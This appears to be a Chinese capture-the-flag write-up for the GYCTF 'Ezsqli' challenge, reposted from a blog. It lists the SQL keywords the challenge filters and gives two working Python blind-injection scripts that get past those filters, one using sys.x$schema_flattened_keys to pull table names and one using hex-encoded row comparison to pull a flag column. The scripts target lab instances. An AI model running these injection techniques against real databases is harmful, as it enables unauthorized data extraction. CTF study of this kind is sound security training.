• GYCTF Ezsqli


    Fuzz 

    发现过滤了 and or if information_schema  union+select合起来的时候会过滤,但分开不过滤   过滤了join  regexp 

     考虑盲注  information_schema被过滤,可以换为sys.x$schema_flattened_keys

    fuzz的时候,发现如果查询成功的话会回显Nu1L

    爆表名

    exp:

    # -*- coding: UTF-8 -*-
    import requests
    flag=''
    url='http://9ed82b30-6500-472d-af3b-2c380fc65adc.node3.buuoj.cn/index.php'
    link=0
    for i in range(1,50):
        for j in range(32,128):
            payload = "1 && ascii(substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),"+str(i)+",1))="+str(j)+"#"
            data={
                'id': payload
            }
            res=requests.post(url,data=data)
            if 'Nu1L' in res.text:
                flag=flag+chr(j)
                print(flag)
                link=1
                break

     

     爆字段的时候,不知道为什么字段爆不完全......

    # -*- coding:utf8 -*-
    import requests
    url = 'http://cc6b46e3-9379-4533-8dd8-3abf48842831.node3.buuoj.cn/index.php'
    
    def trans(flag):
        res = ''
        for i in flag:
            res += hex(ord(i))
        res = '0x' + res.replace('0x','')
        return res
    
    flag = ''
    for i in range(1,700): 
        hexchar = ''
        for char in range(32, 126):
            hexchar = trans(flag+ chr(char))
            payload = '2||((select 1,{})>(select * from f1ag_1s_h3r3_hhhhh))'.format(hexchar)
            data = {
                    'id':payload
                    }
            r = requests.post(url=url, data=data)
            text = r.text
            if 'Nu1L' in r.text:
                flag += chr(char-1)
                print(flag)
                break

     爆表名考的是过滤union select 以及information_schema

    爆字段是区分大小写注入数据

    师傅的出题笔记:https://www.smi1e.top/%e6%96%b0%e6%98%a5%e6%88%98%e7%96%ab%e5%85%ac%e7%9b%8a%e8%b5%9b-ezsqli-%e5%87%ba%e9%a2%98%e5%b0%8f%e8%ae%b0/

    无需in的sql盲注 https://nosec.org/home/detail/3830.html

  • 相关阅读:
    linux中apt-get使用
    部署ceph
    cinder存储服务
    ceph简介
    Horizon Web管理界面
    neutron网络服务2
    neutron网络服务
    nova计算服务
    cinder存储服务
    keystone身份认证服务
  • 原文地址:https://www.cnblogs.com/tiaopidejun/p/12367855.html
Copyright © 2020-2023  润新知